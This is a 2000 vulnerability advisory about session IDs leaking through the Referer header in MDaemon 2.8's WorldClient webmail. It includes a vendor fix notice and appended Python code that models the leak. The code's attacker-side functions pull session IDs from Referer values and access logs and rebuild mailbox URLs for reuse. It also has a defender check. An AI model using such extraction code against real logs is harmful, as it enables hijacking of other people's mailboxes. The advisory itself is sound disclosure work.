Session hijacking in Alt-N's MDaemon 2.8

Type securityvulns
Reporter Securityvulns
Modified 2000-08-10T00:00:00



Here's a bug report and a fix for MDaemon 2.8.


It is possible to hijack an HTTP session from MDaemon / WorldClient Standard version 2.8


MDaemon 2.8 comes with WorldClient Standard, which allows you to read your mail using a browser. When you receive an HTML formatted page and click on a link, WorldClient sends the session ID in the referrer field of the HTTP request. This ID can then be used to open the user's mailbox from any other location.

Vendor status:

Contacted and a fix was released one day after reporting the problem (compliments to Alt-N!)


Download the fix for MDaemon 2.8 and upgrade to You will need MDaemon version to install this fix.
- NT version
- 9X version


Users of MDaemon version 3 should also upgrade to the latest version as this problem also existed in MDaemon 3. It was fixed a few months ago.

Jeroen Schipper

--
Network Administrator :: Utrecht University, Center for Information Technology and Multimedia
Office: KNG80, k2.09 / Phone/fax: +31(30) 253 6031 / 9191
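The leak described in the report, modelled as an added example (this is not code from the original report, from Alt-N or from WorldClient): the browser copies the URL of the page it is on into the Referer header when a link is followed, so a session ID carried in that URL reaches whichever host the link points at; whoever runs that host can read the ID back out of its access log and reopen the mailbox. The query-parameter name "Session", the URL layout, the host names and the log lines are all constructed for illustration; the page does not show WorldClient's real URL format.

```python
import re
from urllib.parse import urlsplit, urlunsplit, parse_qsl, urlencode

# Assumed for illustration: name of the query parameter carrying the session ID.
SESSION_PARAM = "Session"


def referer_sent_on_click(current_page_url):
    """Browser behaviour behind the leak: when a link on current_page_url is
    followed, the full URL of that page (query string included, only the
    #fragment dropped) is sent as the Referer header to the link's host."""
    s = urlsplit(current_page_url)
    return urlunsplit((s.scheme, s.netloc, s.path, s.query, ""))


def session_id_from_referer(referer, param=SESSION_PARAM):
    """Attacker side: pull the session ID out of a received Referer value,
    or return None if the Referer carries no such parameter."""
    for key, value in parse_qsl(urlsplit(referer).query):
        if key == param:
            return value
    return None


def mailbox_url_from_referer(referer, param=SESSION_PARAM):
    """Attacker side: rebuild a URL that reopens the mailbox from any other
    location, since the server trusts the session ID alone. Keeps only the
    session parameter; message-specific parameters are dropped."""
    sid = session_id_from_referer(referer, param)
    if sid is None:
        return None
    s = urlsplit(referer)
    return urlunsplit((s.scheme, s.netloc, s.path, urlencode({param: sid}), ""))


# Apache "combined" log format as seen on the third-party site a user clicked to.
_COMBINED = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) (\S+) "([^"]*)" "([^"]*)"$'
)


def find_leaked_sessions(log_lines, param=SESSION_PARAM):
    """Scan combined-format access log lines for Referer values that carry a
    session ID. Returns unique (client_ip, referring_host, session_id) tuples
    in order of first appearance."""
    found = []
    for line in log_lines:
        m = _COMBINED.match(line)
        if not m:
            continue
        client_ip, referer = m.group(1), m.group(6)
        sid = session_id_from_referer(referer, param)
        if sid is None:
            continue
        entry = (client_ip, urlsplit(referer).netloc, sid)
        if entry not in found:
            found.append(entry)
    return found


def page_url_is_safe(url, param=SESSION_PARAM):
    """Defender check for the fixed design: no URL the browser can turn into a
    Referer may carry the session ID (it belongs in a cookie instead)."""
    return all(key != param for key, _ in parse_qsl(urlsplit(url).query))


# Constructed sample: two hits on a third-party site from a webmail user who
# clicked a link in an HTML message, plus one unrelated request.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Aug/2000:11:02:17 +0200] "GET /promo.html HTTP/1.0" 200 1532 '
    '"http://webmail.example.org/WorldClient.cgi?Session=ABC123XYZ&View=Msg&Id=42" '
    '"Mozilla/4.7 [en] (WinNT; I)"',
    '198.51.100.9 - - [10/Aug/2000:11:03:40 +0200] "GET /index.html HTTP/1.0" 200 882 '
    '"-" "Mozilla/4.7 [en] (WinNT; I)"',
    '203.0.113.7 - - [10/Aug/2000:11:05:02 +0200] "GET /img/logo.gif HTTP/1.0" 200 4021 '
    '"http://webmail.example.org/WorldClient.cgi?Session=ABC123XYZ&View=Msg&Id=42" '
    '"Mozilla/4.7 [en] (WinNT; I)"',
]

if __name__ == "__main__":
    for ip, host, sid in find_leaked_sessions(SAMPLE_LOG):
        print(f"{ip} leaked session {sid} for {host}; "
              f"hijack via {mailbox_url_from_referer(f'http://{host}/WorldClient.cgi?Session={sid}')}")
```

The check in page_url_is_safe is the property the fix has to establish: once the session ID travels in a cookie rather than in the URL, there is nothing in the Referer for a third party to reuse. Modern browsers additionally honour a Referrer-Policy header that trims the Referer to the origin, but that option did not exist in 2000 and is a second line of defence, not a substitute for keeping secrets out of URLs.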
